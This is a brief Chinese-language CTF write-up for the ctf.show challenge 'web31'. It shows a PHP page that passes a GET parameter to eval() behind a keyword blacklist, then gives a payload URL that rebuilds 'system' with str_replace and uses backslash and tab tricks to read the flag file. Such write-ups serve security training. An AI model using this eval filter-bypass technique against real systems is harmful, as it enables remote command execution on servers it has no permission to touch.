web31

代码审计，还是很简单那

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

这题过滤了点，有点难受

我的思路是使用str_replace构造出system，然后利用shell中的绕过技巧，反斜杠绕过和制表符绕过

payload：

 http://82326afb-de7a-4855-96bd-adaec5a06e91.challenge.ctf.show/?c=$s="syste";$s=str_replace("e","em",$s);$s("c\at\tfla??ph?");